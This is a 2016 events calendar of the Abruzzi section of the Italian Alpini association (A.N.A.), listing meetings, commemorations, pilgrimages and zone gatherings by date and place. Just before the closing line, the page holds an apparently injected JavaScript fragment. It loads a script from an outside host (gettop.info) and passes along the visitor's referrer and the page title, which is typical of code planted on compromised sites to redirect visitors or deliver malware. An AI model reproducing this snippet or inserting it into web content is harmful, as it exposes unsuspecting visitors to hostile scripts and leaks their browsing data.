A.N.A. Sezione Abruzzi

Elenco Manifestazioni 2016

                                                       Integrato con le manifestazioni a carattere Nazionale – Riunioni CDN – Gare sportive Nazionali
mese giorno località manifestazione
gennaio 16 MILANO Riunione CDN
17 CEVA Commemorazione Novo Postojalowka Caduti Cuneense (Sez. CEVA)
23 BRESCIA 73 NIKOLAJEWKA A BRESCIA
gennaio 25-26-27-28 Ca.STA
febbraio 13 Riunione CDN
febbraio 20-21 ISOLA DEL GRANSASSO Commemorazione Seleleny-jar (ISOLA DEL GRAN SASSO  TE)
febbraio 25-26-27-28 VALTELLINESE ALPIniadi INVERNALI IN VALTELLINA
marzo 12 RIUNIONE CDN
aprile 16 Riunione CDN
aprile 17. MILANO CENTENARIO morte Perrucchetti a Cassano D’Adda
maggio 1. FARA SA MARTINO MANIFESTAZIONE 7° ZONA
maggio 13-14-15 ASTI 89ª Adunata Nazionale AD ASTI
maggio 28 Riunione CDN
maggio 29 Milano Assemblea Delegati
giugno 4-5. VICENZA 1° EDIZIONE CORALITA’ ALPINA A VILLA CORDELLINA
Cuneo
giugno 5 PORDENONE 40°CAMPIONATO CORSA IN MONTAGNA A STAFFETTA A TRAMONTI DI SOTTO
giugno 5 ABRUZZI Raduno  4° Zona Torre Sperone Gioa dei Marsi
giugno 11 MILANO RIUNIONE CDN
giugno 12 ABRUZZI PELLEGRINAGGIO AL VOLTO SANTO (MANOPPELLO  PE)
giugno 18-19 GORIZIA RADUNO 3° RAGGURPPAMENTO A GORIZIA
giugno 26 ROCCARASO 6°  ZONA  MONTE ZURLONE
giugno 26 BRESCIA CAMPIONATO MARCIA DI REGOLARITA’ A SAREZZO
giugno 26 TRENTO PELLEGRINAGGIO AL RIFUGIO  CONTRIN
luglio 16-17 TORRICELLA SICURA 9°  TORRICELLA SICURA
luglio 3 IMPERIA 67° RADUNO AL SACRARIO CUNEENSE AL COL DI NAVA
luglio 8 MILANO ANNIVERSARIO FONDAZIONE A.N.A.
luglio 10 PIZZOFERRATO 7° ZONA RADUNO DI ZONA
luglio 10 ASIAGO PELLEGRINAGGIO ORTIGARA
luglio 23-24 RIVISONDOLI 6° ZONA RADUNO DI ZONA
luglio 31 TRENTO 53° PELLEGRINAGGIO IN ADAMELLO
luglio 31 S.PELINO 4° ZONA  MANIFESTAZIONE DI ZONA
agosto 7 GIOIA DEI MARSI MANIFESTAZIONE  GIORNATA DELL’ALPINO
settembre 4 VICENZA PELLEGRINAGGIO AL MONTE PASUBIO
settembre 4 UDINE PELLEGRINAGGIO AL MONTE BERNADIA
settembre 3-4. ABRUZZI RADUNO SEZIONALE A CASTELLALTO (TE)
settembre 11. CASTELVECCHIO 5° ZONA RADUNO DI ZONA
settembre 10-11. VAL SUSA RADUNO 1° RAGGRUPPAMENTO A SUSA
settembre 18-18. CITTA S. ANGELO 8° ZONA RADUNO  DI ZONA
settembre 17-18 GEMONA RIUNIONE CDN A GEMONA 40° ANNIVERSARIO TERREMOTO FRIULI A GEMONA
settembre 18 CARNICA 45° CAMPIONATO CORSA IN MONTAGNA A PALUZZA
settembre 22 Civitella Roveto SAN MAURIZIO PATRONO DEGLI ALPINI
settembre 24-25 VICENZA 6° EDIZIONE RADUNO FANFARE ALPINE IN CONGEDO
ottobre 1-2. MARCHE RADUNO 4° RAGGRUPPAMENTO AD ASCOLI PICENO
ottobre 2 BARI-PUGLIA-BASILICATA PELLEGRINAGGIO AL SACRARIO MILITARE D’OLTREMARE DI BARI
ottobre 8-9. L’AQUILA MANIFESTAZIONE 1° ZONA
ottobre 8-9. Venezia Festa Madonna del Don (Sez Venezia)
ottobre 15.16 SALO’ Raduno 2° Raggruppamento A DESENZANO DEL GARDA
ottobre 22 MILANO RIUNIONE CDN
novembre 12-13. CASOLI D’ATRI 9° ZONA  MANIFESTAZIONE DI ZONA
novembre 19 Milano Riunione CDN
novembre 20 Milano Riunione Presidenti sezioni Italia
novembre 20-21. PIETRANSIERI 6° ZONA  LIMMARI
novembre
dicembre 10 Milano Riunione CDN
dicembre 11 Milano Messa di Natale Duomo
DA DEFINIRE PRETURO 2° ZONA RADUNO DI ZONA
DA DEFINIRE AVEZZANO RADUNO 4° RAGGRUPPAMENTO  2017
DA DEFINIRE SORA 3° ZONA  RADUNO DI ZONA

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

L’Alpino d’Abruzzo